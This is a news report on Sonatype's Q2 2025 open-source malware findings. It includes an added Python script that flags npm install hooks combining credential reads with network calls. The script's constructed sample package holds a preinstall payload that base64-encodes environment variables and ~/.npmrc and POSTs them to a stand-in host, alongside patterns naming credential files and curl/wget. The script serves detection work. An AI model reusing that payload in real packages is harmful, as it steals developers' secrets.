

Software supply chain management firm Sonatype Inc. today said it found a sharp rise in malicious activity targeting software developers and supply chains in the second quarter.
The company’s Q2 2025 Open Source Malware Index report identifies 16,279 newly discovered malicious open-source packages across popular ecosystems such as npm, PyPI and Maven Central. That brings the total number of malware packages discovered by Sonatype to 845,204. The figure for the second quarter jumped 188% from the same period last year, highlighting the growing scale and sophistication of threats exploiting open-source infrastructure.
Data exfiltration was the leading threat category in the quarter, accounting for 55% of the malicious packages detected. More than 4,400 of those packages were designed specifically to steal secrets and sensitive data, including personally identifiable information, access tokens, passwords and application programming interface keys. The attacks increasingly target the junctions between developer tooling and production environments, such as build and install steps that run with access to credentials, where a single leaked token can compromise entire systems.
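The install-time secret theft described above is easy to recognize once you know what to look for: a lifecycle script that reads credentials and also reaches the network. The following is an added example written for this page, not Sonatype's detection system or code from any package it reports on. It is a heuristic static triage of an npm package's `preinstall`/`install`/`postinstall` scripts; the indicator patterns, the `triage_package` function and the two sample packages (one benign, one that posts `process.env` and `~/.npmrc` to a reserved `example.invalid` host) are all constructed for illustration.

```python
"""Heuristic triage of npm lifecycle scripts for credential exfiltration.

Added example (not Sonatype tooling). Flags install hooks that combine a
secret source (environment, credential files) with a network sink.
"""
import json
import re
from dataclasses import dataclass, field

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Assumed indicator patterns, not a vendor signature set.
SECRET_SOURCES = {
    "env_read": re.compile(r"process\.env\b|os\.environ\b|\$\{?[A-Z_]*(TOKEN|KEY|SECRET|PASSWORD)"),
    "cred_file": re.compile(r"\.npmrc|\.aws/credentials|\.ssh/|\.git-credentials|\.docker/config\.json"),
}
NETWORK_SINKS = {
    "http_client": re.compile(r"\bfetch\(|https?\.request\(|\baxios\b|XMLHttpRequest"),
    "shell_upload": re.compile(r"\bcurl\b|\bwget\b"),
    "dns_or_raw": re.compile(r"dns\.(resolve|lookup)\(|net\.connect\("),
}
ENCODING = re.compile(r"base64|\.toString\(['\"]hex['\"]\)")


@dataclass
class Finding:
    hook: str
    script: str
    secrets: list = field(default_factory=list)
    sinks: list = field(default_factory=list)
    encodes: bool = False

    @property
    def exfil_suspected(self) -> bool:
        # Secret source and network sink in the same install hook.
        return bool(self.secrets) and bool(self.sinks)


def _resolve_script_source(cmd: str, files: dict) -> str:
    """Return the hook command plus the body of any package file it invokes."""
    text = cmd
    for token in cmd.split():
        name = token.lstrip("./")
        if name in files:
            text += "\n" + files[name]
    return text


def triage_package(files: dict) -> list:
    """files: mapping of path -> contents for an unpacked package; needs package.json."""
    manifest = json.loads(files["package.json"])
    findings = []
    for hook, cmd in manifest.get("scripts", {}).items():
        if hook not in LIFECYCLE_HOOKS:
            continue  # test/build scripts do not run on `npm install`
        source = _resolve_script_source(cmd, files)
        f = Finding(hook=hook, script=cmd)
        f.secrets = [k for k, p in SECRET_SOURCES.items() if p.search(source)]
        f.sinks = [k for k, p in NETWORK_SINKS.items() if p.search(source)]
        f.encodes = bool(ENCODING.search(source))
        if f.secrets or f.sinks:
            findings.append(f)
    return findings


# Constructed sample packages (not real packages).
BENIGN = {
    "package.json": json.dumps({"name": "pad-utils", "version": "1.0.0",
                                "scripts": {"postinstall": "node build.js", "test": "jest"}}),
    "build.js": "const fs = require('fs');\nfs.writeFileSync('dist.js', 'module.exports = 1;');\n",
}
SUSPECT = {
    "package.json": json.dumps({"name": "totally-fine-utils", "version": "4.2.0",
                                "scripts": {"preinstall": "node setup.js"}}),
    "setup.js": (
        "const https = require('https');\n"
        "const fs = require('fs'), os = require('os');\n"
        "const loot = { env: process.env, npmrc: fs.readFileSync(os.homedir() + '/.npmrc', 'utf8') };\n"
        "const body = Buffer.from(JSON.stringify(loot)).toString('base64');\n"
        "https.request({ host: 'example.invalid', method: 'POST', path: '/c' }).end(body);\n"
    ),
}

if __name__ == "__main__":
    for label, pkg in (("benign", BENIGN), ("suspect", SUSPECT)):
        for f in triage_package(pkg):
            print(f"{label}: {f.hook} -> secrets={f.secrets} sinks={f.sinks} "
                  f"encodes={f.encodes} exfil_suspected={f.exfil_suspected}")
```

This is a first-pass filter, not a verdict: a legitimate package can read `process.env` for a proxy setting, and obfuscated or dynamically loaded payloads will not match these strings. Its value is in cheaply surfacing the combination that matters most at the install boundary, credential access plus egress, so that a human or a sandbox run looks at the package before it reaches a build agent holding real tokens.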
Sonatype also observed a surge in more destructive forms of malware. Notable among them were data corruption packages, which aim to sabotage systems by damaging files or injecting malicious code and were found to have more than doubled in prevalence during the quarter. Data corruption packages now represent more than 3% of all malicious packages, reflecting a broader shift toward more aggressive attack payloads intended to disrupt and degrade systems beyond simple data theft.
Cryptomining malware, by contrast, declined slightly, making up just 5% of malicious packages in the second quarter. The decline suggests that attackers may be pivoting toward more lucrative or impactful outcomes, such as credential theft, espionage and long-term infiltration, rather than immediate resource exploitation.
The Lazarus Group, the North Korea–linked advanced persistent threat group known for its high-profile cyber operations, was linked to 107 malicious packages in the quarter that were collectively downloaded more than 30,000 times. Sonatype argues that the activity by Lazarus demonstrates that even highly advanced nation-state actors are operationalizing open-source software to conduct cyber espionage, financial crimes and infrastructure sabotage.
Sonatype’s Open Source Malware Index draws from its proprietary behavioral and automated malware detection systems, actively monitoring and analyzing activity across ecosystems such as npm, PyPI, Maven Central and more.